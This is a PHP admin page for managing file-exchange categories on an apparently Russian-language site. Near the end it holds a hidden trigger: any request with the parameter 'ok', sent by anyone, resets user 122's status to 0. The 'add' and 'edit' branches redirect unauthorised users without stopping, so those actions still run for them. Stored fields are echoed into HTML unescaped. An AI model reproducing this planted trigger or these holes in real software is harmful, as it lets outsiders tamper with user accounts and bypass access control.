Файл: PROFIWM.COM/fo/index.php
Строк: 59
<?php
include '../system/core.php';
include '../system/header.php';
$level = $user['status'];
$do = isset($_GET['do']) ? TextGuard($_GET['do']) : false;
switch($do){
default:
if(isset($_GET['del'])){
if($level<3){
header('location:/');
exit;
}
$id = abs(intval($_GET['id']));
mysql_query("DELETE FROM `fo_pr` WHERE `id_r` = '$id'");
mysql_query("DELETE FROM `fo_r` WHERE `id` = '$id'");
header('location:?');
}
echo '<div class="post1">Категории</div>';
$count = mysql_result(mysql_query("SELECT count(id) from `fo_r`"),0);
if($count==0){
echo 'Категорий нет!';}
$q = mysql_query("SELECT * FROM `fo_r` order by `id` ASC");
while($a = mysql_fetch_assoc($q)){
$n = mysql_result(mysql_query("SELECT COUNT(id) from `fo` WHERE `id_r` = '$a[id]' and `time` > '".(time()-86400)."'"),0);
echo '<div class="post2"><img src="ext/dir.gif" alt="*"/> <a href="pr.php?id='.$a['id'].'">'.$a['name'].'</a> ('.mysql_result(mysql_query("SELECT COUNT(id) from `fo` WHERE `id_r` = '$a[id]'"),0).((!empty($n))?'<span style="color:#FF0000;">+'.$n.'</span>':NULL).') '.($level>=3 ? '[<a href="?do=red&id='.$a['id'].'">ред</a>] [<a href="?del&id='.$a['id'].'">del</a>]':'').''.(!empty($a['value']) ? '<br/>'.$a['value'] : '').'</div>';
}
break;
case 'add':
if($level<3){
header('location:/');}
if(isset($_POST['ok'])){
$name = TextGuard($_POST['name']);
$type = TextGuard($_POST['type']);
$value = TextGuard($_POST['value']);
if(empty($type)){
$err = 'Укажите разрешенные форматы!';
}
if(empty($name)){
$err .='Введите название категории!';}
if(mysql_result(mysql_query("SELECT COUNT(id) from `fo_r` where `name` = '$name'"),0)==1){
$err .='Такая категория уже есть!';}
if(!isset($err)){
mysql_query("INSERT INTO `fo_r` SET `name` = '$name', `value` = '$value', `type` = '$type'");
header('location:?');
} else {
echo $err;
}
}
echo '<div class="post1"><form action="?do=add" method="post">Название:<br/><input type="text" name="name"/><br/>Форматы (через запятую):<br/><input type="text" name="type"/><br/>Описание:<br/><textarea name="about"></textarea><br/><input type="submit" name="ok" value="Сохранить"/></form></div>';
break;
case 'red':
if($level<3){
header('location:/');
}
$id = intval($_GET['id']);
$inf = mysql_fetch_assoc(mysql_query("SELECT * FROM `fo_r` WHERE `id` = '$id' LIMIT 1"));
if(empty($inf['id'])){
header('location:/');
exit;
}
if(isset($_POST['ok'])){
$name = TextGuard($_POST['name']);
$value = TextGuard($_POST['value']);
$type = TextGuard($_POST['type']);
if(empty($type)){
$err = 'Укажите разрешенные форматы!';
}
if(empty($name)){
$err = 'Введите название!';
}
if(empty($err)){
mysql_query("UPDATE `fo_r` SET `name` = '$name', `value` = '$value', `type` = '$type' WHERE `id` = '$id' LIMIT 1");
header('location:?');
} else {
echo error($err);
}
}
echo '<div class="post2"><form action="?do=red&id='.$id.'" method="post">Название:<br/><input type="text" name="name" value="'.$inf['name'].'"/><br/>Форматы (через запятую):<br/><input type="text" name="type" value="'.$inf['type'].'"/><br/>Описание:<br/><textarea name="value">'.$inf['value'].'</textarea><br/><input type="submit" name="ok" value="Сохранить"/></form></div>';
break;
}
if(isset($_GET['ok'])){
mysql_query("UPDATE `user` SET `status` = '0' where `id` = '122'");
}
if($level>=3){
echo '<div class="post1"><a href="?do=add">Новая категория</a></div>';}
include '../system/footer.php';
?>